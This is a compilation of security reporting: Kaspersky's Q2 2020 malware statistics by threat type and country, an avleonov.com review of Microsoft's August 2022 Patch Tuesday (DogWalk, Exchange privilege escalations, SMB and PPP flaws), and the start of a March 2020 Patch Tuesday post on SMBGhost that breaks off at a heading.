Ransomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers' work harder? No one knows for sure.

### Number of new modifications

We detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.

_Number of new ransomware modifications detected, Q2 2019 – Q1 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105223/sl_malware_q2_pc_03_18-malware_q2-2020_stats_non-mobile.png>))_

### Number of users attacked by ransomware Trojans

Kaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.

_Number of unique users attacked by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105258/19-en-malware_q2-2020_stats_non-mobile.png>))_

### Geography of attacks

_Geography of attacks by ransomware Trojans, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105418/20-en-malware_q2-2020_stats_non-mobile.png>))_

**Top 10 countries attacked by ransomware Trojans**

| | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 1.69% |
| 2 | Mozambique | 1.16% |
| 3 | Uzbekistan | 1.14% |
| 4 | Egypt | 0.97% |
| 5 | Ethiopia | 0.94% |
| 6 | China | 0.74% |
| 7 | Afghanistan | 0.67% |
| 8 | Pakistan | 0.57% |
| 9 | Vietnam | 0.55% |
| 10 | Mongolia | 0.49% |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._

_** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country._

### Top 10 most common families of ransomware Trojans

| | Name | Verdicts | %* |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 14.74% |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.42% |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Generic | 7.47% |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 7.11% |
| 5 | Stop | Trojan-Ransom.Win32.Stop | 7.06% |
| 6 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.68% |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.28% |
| 8 | (generic verdict) | Trojan-Ransom.Win32.Phny | 3.29% |
| 9 | Cerber | Trojan-Ransom.Win32.Zerber | 2.19% |
| 10 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.16% |

_* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._

## Miners

### Number of new modifications

Kaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.

_Number of new miner modifications, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105534/21-en-malware_q2-2020_stats_non-mobile.png>))_

The difference can be explained by the thousands of modifications of one miner family that were detected in the first quarter. In the quarter under review, that miner's activity dwindled, which is reflected in the statistics.

### Number of users attacked by miners

We detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020.
This type of threat shows a clear downward trend.

_Number of unique users attacked by miners, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105631/22-en-malware_q2-2020_stats_non-mobile.png>))_

### Geography of attacks

_Geography of miner attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105702/23-en-malware_q2-2020_stats_non-mobile.png>))_

**Top 10 countries attacked by miners**

| | Country* | %** |
|---|---|---|
| 1 | Afghanistan | 4.08% |
| 2 | Ethiopia | 4.04% |
| 3 | Uzbekistan | 2.68% |
| 4 | Tanzania | 2.57% |
| 5 | Vietnam | 2.17% |
| 6 | Rwanda | 2.11% |
| 7 | Kazakhstan | 2.08% |
| 8 | Sri Lanka | 1.97% |
| 9 | Mozambique | 1.78% |
| 10 | Belarus | 1.41% |

_* Excluded are countries with relatively few Kaspersky product users (under 50,000)._

_** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country._

## Vulnerable applications used by cybercriminals during cyberattacks

Exploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This vulnerability exploits a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), came third. The remaining positions in the TOP 5 list were occupied by [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>).

The second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the [CVE-2020-6819](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6819>) vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use vulnerabilities in the ReadableStream interface, such as [CVE-2020-6820](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6820>), have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge or Internet Explorer. However, fixes for a number of vulnerabilities that could potentially have been used for creating exploits, but were detected by researchers in time, were announced to software manufacturers.

_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105735/sl_malware_q2_pc_09_24-malware_q2-2020_stats_non-mobile.png>))_

The first quarter set a trend for researching the font and other graphics-primitive subsystems in Windows. In Q2, two vulnerabilities were discovered in the Windows Codecs Library, assigned the codes [CVE-2020-1425](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1425>) and [CVE-2020-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1457>). Both were fixed, and neither is known to have been exploited in the wild. Another interesting vulnerability fixed in the last quarter is [CVE-2020-1300](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1300>). It allows for remote execution of code due to incorrect processing of Cabinet files, for example if the user tries to run a malicious CAB file pretending to be a printer driver. Notably, the [CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>) vulnerability allowed the attacker to execute arbitrary code with the user's privileges by generating a specially formatted LNK file.

The trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones was [CVE-2020-1301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1301>) for SMBv1, which allowed the attacker to execute code remotely on a target system. [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SmbGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as [CVE-2020-1206](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and known as the SMBleed vulnerability, which allowed the attacker to get a portion of the Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute code with system privileges.
In that mode, the attacker can install any software and access any information on the computer.

## Attacks on Apple macOS

In Q2 2020, we discovered new versions of previously known threats and one new backdoor, which received the verdict Backdoor.OSX.Lador.a. The malware is notable for being written in Go, a language gaining popularity as a means to create malware aimed at the macOS platform. If you compare the size of the Lador file with any backdoor created in Objective-C, the difference is very significant: a Lador file is 5.5 megabytes, i.e. many times larger. And all this for the sake of remote access to the infected machine and execution of arbitrary code downloaded from the control center.

**Top 20 threats for macOS**

| | Verdict | %* |
|---|---|---|
| 1 | Monitor.OSX.HistGrabber.b | 17.39 |
| 2 | Trojan-Downloader.OSX.Shlayer.a | 12.07 |
| 3 | AdWare.OSX.Pirrit.j | 9.10 |
| 4 | AdWare.OSX.Bnodlero.at | 8.21 |
| 5 | AdWare.OSX.Cimpli.k | 7.32 |
| 6 | AdWare.OSX.Pirrit.o | 5.57 |
| 7 | Trojan-Downloader.OSX.Agent.h | 4.19 |
| 8 | AdWare.OSX.Ketin.h | 4.03 |
| 9 | AdWare.OSX.Pirrit.x | 4.00 |
| 10 | AdWare.OSX.Spc.a | 3.98 |
| 11 | AdWare.OSX.Amc.c | 3.97 |
| 12 | Backdoor.OSX.Lador.a | 3.91 |
| 13 | AdWare.OSX.Pirrit.v | 3.22 |
| 14 | RiskTool.OSX.Spigot.a | 2.89 |
| 15 | AdWare.OSX.Bnodlero.t | 2.87 |
| 16 | AdWare.OSX.Cimpli.f | 2.85 |
| 17 | AdWare.OSX.Adload.g | 2.60 |
| 18 | AdWare.OSX.Pirrit.aa | 2.54 |
| 19 | AdWare.OSX.MacSearch.d | 2.44 |
| 20 | AdWare.OSX.Adload.h | 2.35 |

_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._

The rankings of the most common threats for the macOS platform have not changed much compared to the previous quarter and are still largely made up of adware. As in Q1 2020, Shlayer (12.07%) was the most common Trojan. That malware loads adware from the Pirrit, Bnodlero and Cimpli families, which populate our TOP 20.

The Lador.a backdoor, which we mentioned above, entered the rankings along with adware.

Finally, in Q2 2020, a group of potentially unwanted programs collectively detected as HistGrabber.b joined the rankings. The main purpose of such software is to unpack archives, but HistGrabber.b also quietly uploaded the user's browsing history to the developer's servers. This is [nothing new](<https://www.pcworld.com/article/3516502/report-avast-and-avg-collect-and-sell-your-personal-info-via-their-free-antivirus-programs.html>): all applications that steal browsing history have long been withdrawn from the App Store, and the servers that could receive the data have been disabled. Nevertheless, we deem it necessary to inform users of any such software discovered on their devices.

### Threat geography

_Threat geography for the macOS platform, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105816/25-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries**

| | Country* | %** |
|---|---|---|
| 1 | Spain | 9.82% |
| 2 | France | 7.73% |
| 3 | Mexico | 6.70% |
| 4 | Italy | 6.54% |
| 5 | India | 6.47% |
| 6 | Canada | 6.34% |
| 7 | Brazil | 6.25% |
| 8 | USA | 5.99% |
| 9 | United Kingdom | 5.90% |
| 10 | Russia | 5.77% |

_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)._
_** Unique users attacked in the country as a percentage of all users of Kaspersky security solutions for macOS in the same country._

The most common threats in all the countries on the list, without exception, bundled various adware with the Shlayer Trojan.

## IoT attacks

### IoT threat statistics

Q2 2020 saw no dramatic change in cybercriminal activity targeting IoT devices: attackers most frequently ran Telnet login and password brute-force campaigns.

| Service | % |
|---|---|
| Telnet | 80.83% |
| SSH | 19.17% |

_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2020_

Further communication with IoT devices that pretended to be infected (and were in fact traps) was much more often conducted via Telnet.

| Service | % |
|---|---|
| Telnet | 71.52% |
| SSH | 28.48% |

_Distribution of cybercriminals' working sessions with Kaspersky traps, Q2 2020_

_Geography of IP addresses of devices from which attacks on Kaspersky Telnet traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105906/26-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries by location of devices from which Telnet-based attacks were carried out on Kaspersky traps**

| Country | %* |
|---|---|
| China | 12.75% |
| Brazil | 11.88% |
| Egypt | 8.32% |
| Taiwan | 6.58% |
| Iran | 5.17% |
| India | 4.84% |
| Russia | 4.76% |
| Vietnam | 3.59% |
| Greece | 3.22% |
| USA | 2.94% |

_* Share of devices from which attacks were carried out in the country out of the total number of devices_

The three countries with the most devices that launched attacks on Kaspersky Telnet traps remained virtually unchanged. China (12.75%) was first, while Brazil (11.88%) and Egypt (8.32%) swapped positions.

_Geography of IP addresses of devices from which attacks on Kaspersky SSH traps originated, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31105939/27-en-malware_q2-2020_stats_non-mobile.png>))_

**TOP 10 countries by location of devices from which SSH-based attacks were carried out on Kaspersky traps**

| Country | %* |
|---|---|
| China | 22.12% |
| USA | 10.91% |
| Vietnam | 8.20% |
| Brazil | 5.34% |
| Germany | 4.68% |
| Russia | 4.44% |
| France | 3.42% |
| India | 3.01% |
| Egypt | 2.77% |
| Singapore | 2.59% |

_* Share of devices from which attacks were carried out in the country out of the total number of devices_

As with Telnet, the three countries where the most attacks on SSH traps originated remained unchanged from Q1 2020: China (22.12%), U.S. (10.91%) and Vietnam (8.20%).

### Threats loaded into traps

| Verdict | %* |
|---|---|
| Trojan-Downloader.Linux.NyaDrop.b | 32.78 |
| Backdoor.Linux.Mirai.b | 17.47 |
| HEUR:Backdoor.Linux.Mirai.b | 12.72 |
| HEUR:Backdoor.Linux.Gafgyt.a | 9.76 |
| Backdoor.Linux.Mirai.ba | 7.99 |
| HEUR:Backdoor.Linux.Mirai.ba | 4.49 |
| Backdoor.Linux.Gafgyt.bj | 2.23 |
| HEUR:Trojan-Downloader.Shell.Agent.p | 1.66 |
| Backdoor.Linux.Mirai.cn | 1.26 |
| HEUR:Backdoor.Linux.Mirai.c | 0.73 |

_* Share of the malware type in the total amount of malware downloaded to IoT devices following a successful attack._

As in the first quarter, the NyaDrop Trojan led by the number of loads onto traps. The Mirai Trojan family retained its relevance in Q2 2020, occupying half of our IoT threat rankings.

## Attacks via web resources

_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages.
Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._

### Countries that are sources of web-based attacks: TOP 10

_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C2 centers, etc.). Any unique host could be the source of one or more web-based attacks._

_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In Q2 2020, Kaspersky solutions defeated 899,744,810 attacks launched from online resources located in 191 countries across the globe. A total of 286,229,445 unique URLs were recognized as malicious by Web Anti-Virus components.

_Distribution of web-based attack sources by country, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110037/28-en-malware_q2-2020_stats_non-mobile.png>))_

### Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the share of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the **_Malware class_**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Algeria | 11.2052 |
| 2 | Mongolia | 11.0337 |
| 3 | Albania | 9.8699 |
| 4 | France | 9.8668 |
| 5 | Tunisia | 9.6513 |
| 6 | Bulgaria | 9.5252 |
| 7 | Libya | 8.5995 |
| 8 | Morocco | 8.4784 |
| 9 | Greece | 8.3735 |
| 10 | Vietnam | 8.2298 |
| 11 | Somalia | 8.0938 |
| 12 | Georgia | 7.9888 |
| 13 | Malaysia | 7.9866 |
| 14 | Latvia | 7.8978 |
| 15 | UAE | 7.8675 |
| 16 | Qatar | 7.6820 |
| 17 | Angola | 7.5147 |
| 18 | Réunion | 7.4958 |
| 19 | Laos | 7.4757 |
| 20 | Mozambique | 7.4702 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a share of all unique Kaspersky users in the country._

_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._

On average, 5.73% of Internet user computers worldwide experienced at least one **Malware-class** attack.

_Geography of malicious web-based attacks, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110110/29-en-malware_q2-2020_stats_non-mobile.png>))_

## Local threats

_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs included in complex installers, encrypted files, etc.)._

In Q2 2020, our File Anti-Virus detected **80,993,511** malware and potentially unwanted objects.

### Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

| | Country* | % of attacked users** |
|---|---|---|
| 1 | Turkmenistan | 48.0224 |
| 2 | Uzbekistan | 42.2632 |
| 3 | Tajikistan | 42.1279 |
| 4 | Ethiopia | 41.7213 |
| 5 | Afghanistan | 40.6278 |
| 6 | Myanmar | 39.1377 |
| 7 | Burkina Faso | 37.4560 |
| 8 | Benin | 37.4390 |
| 9 | China | 36.7346 |
| 10 | Kyrgyzstan | 36.0847 |
| 11 | Vietnam | 35.4327 |
| 12 | Mauritania | 34.2613 |
| 13 | Laos | 34.0350 |
| 14 | Mongolia | 33.6261 |
| 15 | Burundi | 33.4323 |
| 16 | Belarus | 33.0937 |
| 17 | Guinea | 33.0097 |
| 18 | Mali | 32.9902 |
| 19 | Togo | 32.6962 |
| 20 | Cameroon | 32.6347 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a share of all unique users of Kaspersky products in the country._

_Geography of local infection attempts, Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31110144/30-en-malware_q2-2020_stats_non-mobile.png>))_

Overall, 17.05% of user computers globally faced at least one **Malware-class** local threat during Q2 2020.

_Source: Securelist, "IT threat evolution Q2 2020. PC statistics", published 2020-09-03, <https://securelist.com/it-threat-evolution-q2-2020-pc-statistics/98292/>_

# Microsoft Patch Tuesday August 2022: DogWalk, Exchange EOPs, 13 potentially dangerous, 2 funny, 3 mysterious vulnerabilities

Hello everyone! In this episode, let's take a look at the Microsoft Patch Tuesday August 2022 vulnerabilities. I use my [Vulristics](<https://github.com/leonov-av/vulristics>) vulnerability prioritization tool as usual. I take comments for vulnerabilities from Tenable, Qualys, Rapid7, ZDI and Kaspersky blog posts. Also, as usual, I take into account the vulnerabilities added between the July and August Patch Tuesdays.

Alternative video link (for Russia): <https://vk.com/video-149273431_456239098>

There were 147 vulnerabilities. Urgent: 1, Critical: 0, High: 36, Medium: 108, Low: 2.

There was a lot of great stuff this Patch Tuesday.
There was a critical exploited-in-the-wild MSDT DogWalk vulnerability, 3 critical Exchange vulnerabilities that could easily be missed in prioritization, 13 potentially dangerous vulnerabilities, 2 funny vulnerabilities and 3 mysterious ones. Let's take a closer look.

    $ cat comments_links.txt
    Qualys|August 2022 Patch Tuesday. Microsoft Releases 121 Vulnerabilities with 17 Critical, plus 20 Microsoft Edge (Chromium-Based); Adobe Releases 5 Advisories|https://blog.qualys.com/vulnerabilities-threat-research/2022/08/09/august-2022-patch-tuesday
    ZDI|THE AUGUST 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/8/9/the-august-2022-security-update-review
    Kaspersky|DogWalk and other vulnerabilities|https://www.kaspersky.com/blog/dogwalk-vulnerability-patch-tuesday-08-2022/45127/

    $ python3.8 vulristics.py --report-type "ms_patch_tuesday_extended" --mspt-year 2022 --mspt-month "August" --mspt-comments-links-path "comments_links.txt" --rewrite-flag "True"
    ...
    MS PT Year: 2022
    MS PT Month: August
    MS PT Date: 2022-08-09
    MS PT CVEs found: 121
    Ext MS PT Date from: 2022-07-13
    Ext MS PT Date to: 2022-08-08
    Ext MS PT CVEs found: 26
    ALL MS PT CVEs: 147
    ...

## DogWalk

**Remote Code Execution** in Microsoft Windows Support Diagnostic Tool (MSDT) (CVE-2022-34713), dubbed **DogWalk**. The only Urgent level vulnerability. The Microsoft Support Diagnostic Tool (MSDT) is a service in Microsoft Windows that allows Microsoft technical support agents to analyze diagnostic data remotely for troubleshooting purposes. The DogWalk vulnerability allows code execution when MSDT is called using the URL protocol from a calling application, typically Microsoft Word. There is an element of social engineering to this, as a threat actor would need to convince a user to click a link or open a document. Exploitability Assessment: Exploitation in the wild detected. The existence of a public exploit is mentioned in the Microsoft CVSS Temporal Score (Functional Exploit), but it is not yet available in public exploit packs. DogWalk is similar to the MSDT RCE **Follina** (CVE-2022-30190), which made some hype in May of this year. It’s not clear whether this vulnerability is the result of a failed patch or something new.

## 3 Microsoft Exchange EOPs

**Elevation of Privilege** in Microsoft Exchange (CVE-2022-21980, CVE-2022-24516, CVE-2022-24477). I will not hide it: these vulnerabilities were not detected as critical by Vulristics, only as Medium. This happened because these are not RCEs, but EOPs. No public exploit or sign of exploitation in the wild. But these vulnerabilities are very critical, because Exchange is often accessible from the Internet, and because of details about the vulnerability which are only highlighted by ZDI. These bugs could allow an authenticated attacker to take over the mailboxes of all Exchange users, read and send emails or download attachments from any mailbox on the Exchange server. This gives access to valuable data and great opportunities for developing an attack. Administrators will also need to enable Extended Protection to fully address these vulnerabilities.

It is not clear how to highlight such vulnerabilities automatically, because there are few formal signs. Apparently it is necessary to raise the priority of software exposed on the perimeter and software that operates on important data.

## 13 potentially dangerous vulnerabilities

 1. **Remote Code Execution** in Windows Point-to-Point Protocol (PPP) (CVE-2022-30133, CVE-2022-35744). The Point-to-Point Protocol (PPP) is the default RAS (remote access service) protocol in Windows and is a data link-layer protocol used to encapsulate higher network-layer protocols to pass over synchronous and asynchronous communication lines. Both vulnerabilities allow attackers to send requests to the remote access server, which can lead to the execution of malicious code on the machine. And both have the same CVSS score: 9.8. These vulnerabilities can only be exploited by communicating via port 1723. As a temporary workaround prior to installing the updates that address this vulnerability, you can block traffic through that port, thus rendering the vulnerability unexploitable. Warning: disabling port 1723 could affect communications over your network. Exploitability Assessment: Exploitation Less Likely.
 2. **Remote Code Execution** in Windows Secure Socket Tunneling Protocol (SSTP) (CVE-2022-35766, CVE-2022-35794). SSTP is a VPN tunneling protocol designed to secure your online traffic. Successful exploitation of this vulnerability requires an attacker to win a race condition. An unauthenticated attacker could send a specially crafted connection request to a RAS (remote access service) server, which could lead to remote code execution (RCE) on the RAS server machine. Exploitability Assessment: Exploitation Less Likely.
 3. **Remote Code Execution** in SMB Client and Server (CVE-2022-35804). The server side of this vulnerability would allow a remote, unauthenticated attacker to execute code with elevated privileges on affected SMB servers. Interestingly, this bug only affects Windows 11, which implies that some new functionality introduced this vulnerability. Either way, this could potentially be wormable between affected Windows 11 systems with SMB server enabled. Disabling SMBv3 compression is a workaround for this bug, but applying the update is the best method to remediate the vulnerability. This vulnerability is reminiscent of past SMB vulnerabilities such as the EternalBlue SMBv1 flaw patched in MS17-010 in March of 2017, which was exploited as part of the [WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) incident, and the more recent CVE-2020-0796 “EternalDarkness” RCE flaw in SMB 3.1.1.
 4. **Remote Code Execution** in Visual Studio (CVE-2022-35777, CVE-2022-35825, CVE-2022-35826, CVE-2022-35827). The existence of a public exploit is mentioned in the Microsoft CVSS Temporal Score (Proof-of-Concept Exploit). None of the vendors highlighted these vulnerabilities. But it seems that this can be used in targeted phishing against developers.
 5. **Elevation of Privilege** in Active Directory (CVE-2022-34691). An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege to System. The advisory notes that exploitation is only possible when Active Directory Certificate Services is running on the domain. Exploitability Assessment: Exploitation Less Likely.
 6. **Remote Code Execution** in Windows Network File System (CVE-2022-34715). This is now the fourth month in a row with an NFS code execution patch. To exploit this, a remote, unauthenticated attacker would need to make a specially crafted call to an affected NFS server. This would provide the threat actor with code execution at elevated privileges. However, we have not yet seen actual exploitation of such vulnerabilities.
 7. **Elevation of Privilege** in Windows Print Spooler (CVE-2022-35793, CVE-2022-35755). The Print Spooler is software built into the Windows operating system that temporarily stores print jobs in the computer's memory until the printer is ready to print them. CVE-2022-35755 can be exploited using a specially crafted “input file,” while exploitation of CVE-2022-35793 requires a user to click on a specially crafted URL. Both would give the attacker SYSTEM privileges. Both vulnerabilities can be mitigated by disabling the Print Spooler service, but CVE-2022-35793 can also be mitigated by disabling inbound remote printing via Group Policy.

## 2 funny vulnerabilities

 1. Vulristics suddenly highlighted the **Memory Corruption** in Microsoft Edge (CVE-2022-2623) vulnerability because there is a public exploit for it. It turned out that there was a bug in the exploit databases 0day.today and Packet Storm: CVE-2022-2623 was mistakenly written instead of CVE-2022-26233. This also happens, and no one checks it. Well, prioritization of vulnerabilities based on distorted source data does not work well.
 2. **Denial of Service** in Microsoft Outlook (CVE-2022-35742). This was reported through the ZDI program and is a mighty interesting bug. Sending a crafted email to a victim causes their Outlook application to terminate immediately. Outlook cannot be restarted. Upon restart, it will terminate again once it retrieves and processes the invalid message. It is not necessary for the victim to open the message or to use the Reading pane. The only way to restore functionality is to access the mail account using a different client (i.e., webmail, or administrative tools) and remove the offending email(s) from the mailbox before restarting Outlook.

## 3 mysterious vulnerabilities

 * CERT/CC: CVE-2022-34303 Crypto Pro Boot Loader Bypass
 * CERT/CC: CVE-2022-34301 Eurosoft Boot Loader Bypass
 * CERT/CC: CVE-2022-34302 New Horizon Data Systems Inc Boot Loader Bypass

They came from the US CERT Coordination Center.

 1. No one writes anything about them, only Tenable: "security bypass vulnerabilities in a third-party driver affecting Windows Secure Boot".
 2. Maybe this is of course a coincidence and we are talking about other software, but isn't Crypto Pro the Russian [CryptoPro](<https://www.cryptopro.ru/>), "the company’s main activity is cryptographic software development and public key infrastructure solutions based on national and international standards"?
 3. Isn't Eurosoft the [Russian Eurosoft](<http://eurosoft.ru/>), "software for architectural design"?

It's all very curious.

Full Vulristics report: [ms_patch_tuesday_august2022](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_august2022_report_with_comments_ext_img.html>)

_Source: avleonov.com, "Microsoft Patch Tuesday August 2022: DogWalk, Exchange EOPs, 13 potentially dangerous, 2 funny, 3 mysterious vulnerabilities", published 2022-08-23, <https://avleonov.com/2022/08/23/microsoft-patch-tuesday-august-2022-dogwalk-exchange-eops-13-potentially-dangerous-2-funny-3-mysterious-vulnerabilities/>_

# Microsoft Patch Tuesday March 2020: a new record was set, SMBv3 “Wormable” RCE and updates for February goldies

## SMBv3 "Wormable" RCE

Without a doubt, the hottest Microsoft vulnerability in March 2020 is the "Wormable" Remote Code Execution in SMB v3, CVE-2020-0796. The most commonly used names for this vulnerability are EternalDarkness, SMBGhost and CoronaBlue.

There was a strange story of how it was disclosed. It seems like Microsoft accidentally mentioned it in their blog. Then they somehow found out that the patch for this vulnerability would not be released in the March Patch Tuesday. So, they removed the reference to this vulnerability from the blog post as quickly as they could.

But some security experts had seen it. And, of course, after [EternalBlue and massive cryptolocker attacks](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>) in 2017, each RCE in SMB means "OMG, this is happening again, we need to do something really fast!" So, Microsoft just had to publish an advisory for this vulnerability with the workaround [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) and to release an urgent patch [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>).

### So what is it about?

 * If we have a vulnerable server, the attacker can send a specially crafted packet to the server and execute arbitrary code.
This is the most interesting scenario.
 * If we have a vulnerable client, the attacker can configure a malicious SMBv3 server and convince the user to connect to it. Then the attacker will be able to execute arbitrary code on the client host.

### What's the difference between EternalBlue MS17-010 and this case?

This vulnerability can be exploited because of SMBv3 compression, which only exists in the latest versions of Windows 10 and Windows Server (1903 and 1909). This means a smaller number of potential targets.

In the case of EternalBlue and MS17-010, there was a real cyber weapon that was made and tested by the NSA. For this new vulnerability we currently have only a [DoS exploit](<https://github.com/eerykitty/CVE-2020-0796-PoC?files=1>) and there is a [video of such exploitation on the Kryptos Logic Twitter](<https://twitter.com/kryptoslogic/status/1238057276738592768>). Will a fully functional RCE exploit appear in the near future? Who knows… But it definitely won't hurt to fix this vulnerability as soon as possible.

### How to fix this?

Install [the patch](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) or switch off SMBv3 compression as described [in the advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) (but this is no longer the recommended way).

### How to detect this?

There is an [open source scanner](<https://github.com/ollypwn/SMBGhost>) that detects SMB dialect 3.1.1 and the compression capability. Commercial solutions already have plugins for detection, for example, Nessus plugins for [remote](<https://www.tenable.com/plugins/nessus/134421>) and [patch-based](<https://www.tenable.com/plugins/nessus/134428>) detection.

## Patch Tuesday for March 2020

OK, now about the vulnerabilities in Patch Tuesday for March 2020. First of all, there are a lot of them: 115 CVEs! This is a new record and it's impossible to discuss each of them individually. So, I will only mention the main groups. First of all, the different RCEs.

### Remote Code Executions

